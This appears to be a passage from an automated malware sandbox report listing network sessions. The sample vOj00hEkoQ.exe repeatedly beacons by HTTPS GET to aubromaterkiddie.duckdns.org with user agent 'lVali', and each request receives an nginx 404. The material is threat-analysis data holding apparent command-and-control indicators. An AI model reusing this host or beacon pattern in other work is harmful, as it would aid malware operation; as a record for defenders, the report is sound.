                2022-08-05 10:12:12 UTC52INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:12 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:12 UTC53INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                126192.168.2.649924208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:12 UTC53OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:12 UTC53INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:12 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:12 UTC53INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                127192.168.2.649925208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:13 UTC53OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:13 UTC53INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:13 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:13 UTC53INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                128192.168.2.649926208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:13 UTC54OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:13 UTC54INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:13 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:13 UTC54INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                129192.168.2.649927208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:13 UTC54OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:13 UTC54INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:13 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:13 UTC54INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.2.649776208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:40 UTC5OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:40 UTC5INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:40 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:40 UTC5INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                130192.168.2.649928208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:13 UTC54OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:13 UTC55INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:13 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:13 UTC55INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                131192.168.2.649929208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:14 UTC55OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:14 UTC55INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:14 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:14 UTC55INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                132192.168.2.649930208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:14 UTC55OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:14 UTC55INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:14 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:14 UTC56INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                133192.168.2.649931208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:14 UTC56OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:14 UTC56INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:14 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:14 UTC56INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                134192.168.2.649932208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:15 UTC56OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:15 UTC56INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:15 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:15 UTC56INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                135192.168.2.649933208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:15 UTC57OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:15 UTC57INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:15 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:15 UTC57INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                136192.168.2.649934208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:15 UTC57OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:15 UTC57INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:15 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:15 UTC57INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                137192.168.2.649935208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:16 UTC57OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:16 UTC58INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:16 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:16 UTC58INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                138192.168.2.649936208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:16 UTC58OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:16 UTC58INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:16 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:16 UTC58INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                139192.168.2.649937208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:17 UTC58OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:17 UTC58INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:17 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:17 UTC59INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.2.649777208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:45 UTC5OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:45 UTC6INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:45 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:45 UTC6INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                140192.168.2.649938208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:18 UTC59OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:18 UTC59INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:18 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:18 UTC59INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                141192.168.2.649939208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:19 UTC59OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:19 UTC59INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:19 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:19 UTC59INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                142192.168.2.649940208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:19 UTC60OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:19 UTC60INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:19 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:19 UTC60INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                143192.168.2.649941208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
